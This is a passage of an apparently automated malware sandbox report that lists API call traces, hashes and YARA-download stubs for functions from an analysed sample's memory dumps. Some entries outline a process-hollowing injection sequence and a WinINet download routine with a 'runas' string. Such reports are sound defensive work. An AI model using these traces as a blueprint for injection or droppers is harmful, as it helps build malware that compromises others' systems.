                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004112BB, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: e1d177dc933f5c3566c7409c8fadad96cc52a9eb2d4ee39ed86f6df5e1c2a46b
                                                                                                                                            • Instruction ID: 80a9df45b838dafa3a6e559d3be64c252a5d324c26abc19f2e2e4166300fd196
                                                                                                                                            • Opcode Fuzzy Hash: e1d177dc933f5c3566c7409c8fadad96cc52a9eb2d4ee39ed86f6df5e1c2a46b
                                                                                                                                            • Instruction Fuzzy Hash: E5F02632501A1496E620372B88017DA27998F82338F10071BFA34925E1DA7C958285AE
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00411629, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                            • Opcode ID: 320449895dae44280f45e36a1c53ebf6393d9d1aeb881ef4eff7373e47e76e92
                                                                                                                                            • Instruction ID: 0a5324e662c9dea11abf6723c900be2a4492fdb398a6822fb8763f7ec6b7c5b7
                                                                                                                                            • Opcode Fuzzy Hash: 320449895dae44280f45e36a1c53ebf6393d9d1aeb881ef4eff7373e47e76e92
                                                                                                                                            • Instruction Fuzzy Hash: 25014472C04219AFDF01AFA99C01BEE7FF4AB44314F14416BFA18E21E1E6758A84D799
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00419C4F, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00415F54,00000001,00000364,00000008,000000FF,?,?,0040EBD3,0040D31C,?,0040DD48,E80042F0), ref: 00419C90
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                            • Opcode ID: 0cbf5874f7295b6a63cb53cb5ec8ae5502b8c5b44a2f1ba8a967f020e35b0a0b
                                                                                                                                            • Instruction ID: f56dbea0b5dfe70caf3e39a5fe41ecf1b66d6e9030266fb18e7445089a5ff3ab
                                                                                                                                            • Opcode Fuzzy Hash: 0cbf5874f7295b6a63cb53cb5ec8ae5502b8c5b44a2f1ba8a967f020e35b0a0b
                                                                                                                                            • Instruction Fuzzy Hash: 03F0503164022456DF201F238D11BDB3BD8DF41760B194127EC48D6240FA7CDC8282EC
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004085A0, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 004041F0: GetTempPathW.KERNEL32(00000104,?,00000000,?), ref: 0040421E
                                                                                                                                            • GetFileAttributesA.KERNELBASE(00000000), ref: 0040861C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFilePathTemp
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3199926297-0
                                                                                                                                            • Opcode ID: b12228c4c54cff754e4d2ec44a222e00894cdac3c3c4e11dd666754c8e90479e
                                                                                                                                            • Instruction ID: 61f23e509fb72dcc8a3ec9841a9315deb942860e3ecf1ea9de4037f263276c28
                                                                                                                                            • Opcode Fuzzy Hash: b12228c4c54cff754e4d2ec44a222e00894cdac3c3c4e11dd666754c8e90479e
                                                                                                                                            • Instruction Fuzzy Hash: AA01DB71D00204DFEB14DBA5E844B9F77BC9714304F41443DD026A72D2D7B95549CBAD
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004159AA, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,0040D31C,?,?,0040EBD3,0040D31C,?,0040DD48,E80042F0,73B76490), ref: 004159DC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                            • Opcode ID: c37912e603a4fb2f1285a3e89420daa74277cb930431a1fcdcba95ddc05ad7eb
                                                                                                                                            • Instruction ID: e35ac5e7cece6743c5da4249d19359c5bf9691d5dcfee95049b00cefedf1e07c
                                                                                                                                            • Opcode Fuzzy Hash: c37912e603a4fb2f1285a3e89420daa74277cb930431a1fcdcba95ddc05ad7eb
                                                                                                                                            • Instruction Fuzzy Hash: 3CE0E5B1251A10DBE63126665C01BDB7A48DFC13B1F160127AC00D6290CA6CCCC281AF
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0041C770, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateFileW.KERNELBASE(00000000,00000000,?,0041CB60,?,?,00000000,?,0041CB60,00000000,0000000C), ref: 0041C78D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                            • Opcode ID: d563dfaa9303f0cbcc920a190e9eded9226704e132240de5d493fcab5f594bc8
                                                                                                                                            • Instruction ID: 5d3ef887da8b63e3444176331524ca0bdbdc0af9896b585ac3d134a1cc739f81
                                                                                                                                            • Opcode Fuzzy Hash: d563dfaa9303f0cbcc920a190e9eded9226704e132240de5d493fcab5f594bc8
                                                                                                                                            • Instruction Fuzzy Hash: D7D06C3210014DBBDF128F84DC06EDA3BAAFB48754F014010BA1856120C732E832AB94
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00407000, Relevance: 1.3, APIs: 1, Instructions: 42COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a5475d76fd82979be6ec8cb75e17979c3fb60db44d835053640c69328c5be01d
                                                                                                                                            • Instruction ID: 3ed45044d6fc0e33f5cc7460239aaf71fffd9159066e9ea8d2e7d9d25936e5ee
                                                                                                                                            • Opcode Fuzzy Hash: a5475d76fd82979be6ec8cb75e17979c3fb60db44d835053640c69328c5be01d
                                                                                                                                            • Instruction Fuzzy Hash: B1016771E0020897DB00FFA59D46EE932ACAF48305F85153AFE44A3182E639E5148A99
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040D350, Relevance: 1.3, APIs: 1, Instructions: 24sleepCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNELBASE(0000EA60), ref: 0040D39B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                            • Opcode ID: a1ef267d074c9429ce2ea38c9677974d3aaf959aa28697d2feeca5d5c2f311b0
                                                                                                                                            • Instruction ID: 56192f8a3b5947a47e7d08408737810b2d48110ed5a47ff7eecf6b360b68e5ed
                                                                                                                                            • Opcode Fuzzy Hash: a1ef267d074c9429ce2ea38c9677974d3aaf959aa28697d2feeca5d5c2f311b0
                                                                                                                                            • Instruction Fuzzy Hash: E4E08C15F0412463942532BF5D0342D3C154A82A58BD9056EE9023B3C3ECAC1A2A43DF
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040D300, Relevance: 1.3, APIs: 1, Instructions: 24sleepCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNELBASE(0000EA60), ref: 0040D34B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                            • Opcode ID: 81ade12046d99b3f1edd7053813fad2823734eddfdc7f31ea66e8550fc6bc7b2
                                                                                                                                            • Instruction ID: c7fef5311c69c2d208d8a81326bd0c392893d7a42eaed8679c44eea342d1f34d
                                                                                                                                            • Opcode Fuzzy Hash: 81ade12046d99b3f1edd7053813fad2823734eddfdc7f31ea66e8550fc6bc7b2
                                                                                                                                            • Instruction Fuzzy Hash: 70E08C15F4412063941472BF5D1342D38154A82A58B9505AEE8023B3C3ECBD0A2A43DF
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0040D3A0, Relevance: 1.3, APIs: 1, Instructions: 24sleepCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNELBASE(0000EA60), ref: 0040D3EB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                            • Opcode ID: 5fda5648490bdbb4edc0f8f3dcd7eac775dc5e5d81415cb6a297a65fd1bc0729
                                                                                                                                            • Instruction ID: d5baa5fc89de899c87e238c3551f3fcafa3748e68ec00422f8a96b2af1cc17f1
                                                                                                                                            • Opcode Fuzzy Hash: 5fda5648490bdbb4edc0f8f3dcd7eac775dc5e5d81415cb6a297a65fd1bc0729
                                                                                                                                            • Instruction Fuzzy Hash: CFE08C55F0412063941433FF5D0742E38154A82A68B99056FE9023B3C3ECAD0A2A93DF
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Non-executed Functions

                                                                                                                                            Function 004020D0, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 155injectionthreadmemoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,00000000), ref: 004020EC
                                                                                                                                            • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00402145
                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0040215E
                                                                                                                                            • GetThreadContext.KERNEL32(?,00000000), ref: 00402173
                                                                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00402196
                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 004021AE
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004021B5
                                                                                                                                            • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 004021D4
                                                                                                                                            • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 004021EF
                                                                                                                                            • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000), ref: 0040222C
                                                                                                                                            • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000), ref: 0040225C
                                                                                                                                            • SetThreadContext.KERNEL32(?,00000000,?,?,00000000), ref: 00402272
                                                                                                                                            • ResumeThread.KERNEL32(?,?,?,00000000), ref: 0040227B
                                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000), ref: 00402289
                                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 004022A0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
                                                                                                                                            • String ID: NtUnmapViewOfSection$ntdll.dll
                                                                                                                                            • API String ID: 4033543172-1050664331
                                                                                                                                            • Opcode ID: 04ab5baca73f1d7fada38baaa7b89abcd72bdfc087db488689baa73d6d6d751b
                                                                                                                                            • Instruction ID: 0e71f42fb7cc77d9bd943e6b41bda9a6dc082800e3d645ecc03e48e1ba3a0098
                                                                                                                                            • Opcode Fuzzy Hash: 04ab5baca73f1d7fada38baaa7b89abcd72bdfc087db488689baa73d6d6d751b
                                                                                                                                            • Instruction Fuzzy Hash: BA515971A40304BFDB208BA4DC85FAABBB8FF08705F940065F609EA2D0D7B5A955DB58
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 02222320, Relevance: 22.7, APIs: 15, Instructions: 155injectionthreadmemoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,00000000), ref: 0222233C
                                                                                                                                            • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 02222395
                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004,?,00000000,00000000), ref: 022223AE
                                                                                                                                            • GetThreadContext.KERNEL32(?,00000000,?,00000000,00000000), ref: 022223C3
                                                                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,00000000,00000000), ref: 022223E6
                                                                                                                                            • GetModuleHandleA.KERNEL32(0042BCFC,0042BCE4,?,00000000,00000000), ref: 022223FE
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02222405
                                                                                                                                            • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,00000000,00000000), ref: 02222424
                                                                                                                                            • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000), ref: 0222243F
                                                                                                                                            • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000,?,00000000,00000000), ref: 0222247C
                                                                                                                                            • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000,?,00000000,00000000), ref: 022224AC
                                                                                                                                            • SetThreadContext.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000), ref: 022224C2
                                                                                                                                            • ResumeThread.KERNEL32(?,?,?,00000000,?,00000000,00000000), ref: 022224CB
                                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,?,00000000,00000000), ref: 022224D9
                                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,00000000), ref: 022224F0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4033543172-0
                                                                                                                                            • Opcode ID: 9ece6e837acb4fa59888a1e4d99704a2eb9bd6168bebd7b156679880e24fc275
                                                                                                                                            • Instruction ID: 174b0f1428fd5d6fb0969f1a2a8589c15feff9d3ce246c9d9c58fcd1d9104920
                                                                                                                                            • Opcode Fuzzy Hash: 9ece6e837acb4fa59888a1e4d99704a2eb9bd6168bebd7b156679880e24fc275
                                                                                                                                            • Instruction Fuzzy Hash: 0F516C71A40305BFEB209B94DC45FAABBB8FF08705F904025FA09E6190D7B6A855DB68
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0041B9EB, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 113COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • ___free_lconv_mon.LIBCMT ref: 0041BA2F
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B5E5
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B5F7
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B609
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B61B
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B62D
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B63F
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B651
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B663
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B675
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B687
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B699
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B6AB
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B6BD
                                                                                                                                            • _free.LIBCMT ref: 0041BA24
                                                                                                                                              • Part of subcall function 004154C1: HeapFree.KERNEL32(00000000,00000000,?,0041B759,00000000,00000000,00000000,E80042EF,?,0041B780,00000000,00000007,00000000,?,0041BB82,00000000), ref: 004154D7
                                                                                                                                              • Part of subcall function 004154C1: GetLastError.KERNEL32(00000000,?,0041B759,00000000,00000000,00000000,E80042EF,?,0041B780,00000000,00000007,00000000,?,0041BB82,00000000,00000000), ref: 004154E9
                                                                                                                                            • _free.LIBCMT ref: 0041BA46
                                                                                                                                            • _free.LIBCMT ref: 0041BA5B
                                                                                                                                            • _free.LIBCMT ref: 0041BA66
                                                                                                                                            • _free.LIBCMT ref: 0041BA88
                                                                                                                                            • _free.LIBCMT ref: 0041BA9B
                                                                                                                                            • _free.LIBCMT ref: 0041BAA9
                                                                                                                                            • _free.LIBCMT ref: 0041BAB4
                                                                                                                                            • _free.LIBCMT ref: 0041BAEC
                                                                                                                                            • _free.LIBCMT ref: 0041BAF3
                                                                                                                                            • _free.LIBCMT ref: 0041BB10
                                                                                                                                            • _free.LIBCMT ref: 0041BB28
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                            • String ID: pB
                                                                                                                                            • API String ID: 161543041-3059159000
                                                                                                                                            • Opcode ID: 4e837837341a8d5f4e3dbcdfec907e9489398fb5dc34642498828c5ad63e8118
                                                                                                                                            • Instruction ID: 02eb9b7f6cedb68595ea1e2e4df000aa86c265fce73759de2f294495a80403d0
                                                                                                                                            • Opcode Fuzzy Hash: 4e837837341a8d5f4e3dbcdfec907e9489398fb5dc34642498828c5ad63e8118
                                                                                                                                            • Instruction Fuzzy Hash: BC315E31600700DFDB21AA3AE845BDB77E8EF80395F10951FE059D7251DB78ADC08798
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0223BC3B, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 113COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • ___free_lconv_mon.LIBCMT ref: 0223BC7F
                                                                                                                                              • Part of subcall function 0223B818: _free.LIBCMT ref: 0223B835
                                                                                                                                              • Part of subcall function 0223B818: _free.LIBCMT ref: 0223B847
                                                                                                                                              • Part of subcall function 0223B818: _free.LIBCMT ref: 0223B859
                                                                                                                                              • Part of subcall function 0223B818: _free.LIBCMT ref: 0223B86B
                                                                                                                                              • Part of subcall function 0223B818: _free.LIBCMT ref: 0223B87D
                                                                                                                                              • Part of subcall function 0223B818: _free.LIBCMT ref: 0223B88F
                                                                                                                                              • Part of subcall function 0223B818: _free.LIBCMT ref: 0223B8A1
                                                                                                                                              • Part of subcall function 0223B818: _free.LIBCMT ref: 0223B8B3
                                                                                                                                              • Part of subcall function 0223B818: _free.LIBCMT ref: 0223B8C5
                                                                                                                                              • Part of subcall function 0223B818: _free.LIBCMT ref: 0223B8D7
                                                                                                                                              • Part of subcall function 0223B818: _free.LIBCMT ref: 0223B8E9
                                                                                                                                              • Part of subcall function 0223B818: _free.LIBCMT ref: 0223B8FB
                                                                                                                                              • Part of subcall function 0223B818: _free.LIBCMT ref: 0223B90D
                                                                                                                                            • _free.LIBCMT ref: 0223BC74
                                                                                                                                              • Part of subcall function 02235711: HeapFree.KERNEL32(00000000,00000000,?,022347F3), ref: 02235727
                                                                                                                                              • Part of subcall function 02235711: GetLastError.KERNEL32(?,?,022347F3), ref: 02235739
                                                                                                                                            • _free.LIBCMT ref: 0223BC96
                                                                                                                                            • _free.LIBCMT ref: 0223BCAB
                                                                                                                                            • _free.LIBCMT ref: 0223BCB6
                                                                                                                                            • _free.LIBCMT ref: 0223BCD8
                                                                                                                                            • _free.LIBCMT ref: 0223BCEB
                                                                                                                                            • _free.LIBCMT ref: 0223BCF9
                                                                                                                                            • _free.LIBCMT ref: 0223BD04
                                                                                                                                            • _free.LIBCMT ref: 0223BD3C
                                                                                                                                            • _free.LIBCMT ref: 0223BD43
                                                                                                                                            • _free.LIBCMT ref: 0223BD60
                                                                                                                                            • _free.LIBCMT ref: 0223BD78
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                            • String ID: B
                                                                                                                                            • API String ID: 161543041-2386870291
                                                                                                                                            • Opcode ID: 99c469b85a8334f7860a8521e5f24c60ddfc68edca42f265535503cae86b3820
                                                                                                                                            • Instruction ID: e2f23d962fe699c46897dfbced78c8998b726a406096b887ccc9b09e8a098702
                                                                                                                                            • Opcode Fuzzy Hash: 99c469b85a8334f7860a8521e5f24c60ddfc68edca42f265535503cae86b3820
                                                                                                                                            • Instruction Fuzzy Hash: A2313EB1620706DFEB32AEB9DC84B9A73E9AF04318F644829E459DB158DF34E9518B10
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004022B0, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 136networkfileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 00402351
                                                                                                                                            • InternetOpenUrlW.WININET(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402363
                                                                                                                                            • InternetReadFile.WININET(00000000,?,00032000,00032000), ref: 0040237A
                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0040238B
                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0040238E
                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0040239F
                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 004023A2
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Internet$CloseHandle$Open$FileRead
                                                                                                                                            • String ID: <$Microsoft Internet Explorer$runas
                                                                                                                                            • API String ID: 4294395943-436926838
                                                                                                                                            • Opcode ID: 9a32d94c8b7939eb78db467fa39caaccb27089aea047c49b7888cc46b6540ea9
                                                                                                                                            • Instruction ID: 836f0c5934710c0407d646d4299d5f63ee009bd7aa37a993408d58964a26c1b2
                                                                                                                                            • Opcode Fuzzy Hash: 9a32d94c8b7939eb78db467fa39caaccb27089aea047c49b7888cc46b6540ea9
                                                                                                                                            • Instruction Fuzzy Hash: A5410731E00118ABDB18DF65CD45BAEB779EF45300F50846EE915B72C1D7BCAA41CB98
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00415C9A, Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 00415CB0
                                                                                                                                              • Part of subcall function 004154C1: HeapFree.KERNEL32(00000000,00000000,?,0041B759,00000000,00000000,00000000,E80042EF,?,0041B780,00000000,00000007,00000000,?,0041BB82,00000000), ref: 004154D7
                                                                                                                                              • Part of subcall function 004154C1: GetLastError.KERNEL32(00000000,?,0041B759,00000000,00000000,00000000,E80042EF,?,0041B780,00000000,00000007,00000000,?,0041BB82,00000000,00000000), ref: 004154E9
                                                                                                                                            • _free.LIBCMT ref: 00415CBC
                                                                                                                                            • _free.LIBCMT ref: 00415CC7
                                                                                                                                            • _free.LIBCMT ref: 00415CD2
                                                                                                                                            • _free.LIBCMT ref: 00415CDD
                                                                                                                                            • _free.LIBCMT ref: 00415CE8
                                                                                                                                            • _free.LIBCMT ref: 00415CF3
                                                                                                                                            • _free.LIBCMT ref: 00415CFE
                                                                                                                                            • _free.LIBCMT ref: 00415D09
                                                                                                                                            • _free.LIBCMT ref: 00415D17
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            • Opcode ID: c5bf6337fde5a585e6641538013a292c1604a874dfe33c768b4c1d8162f38393
                                                                                                                                            • Instruction ID: 166d972883325de44ce7bdabef546b1d3901efceb99f724343cd7b5bc390e77d
                                                                                                                                            • Opcode Fuzzy Hash: c5bf6337fde5a585e6641538013a292c1604a874dfe33c768b4c1d8162f38393
                                                                                                                                            • Instruction Fuzzy Hash: FA21BB76900618EFCB41EF95C841DDD7FB8AF88344B00556AFA199B121DB35EAC4CB84
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 02235EEA, Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
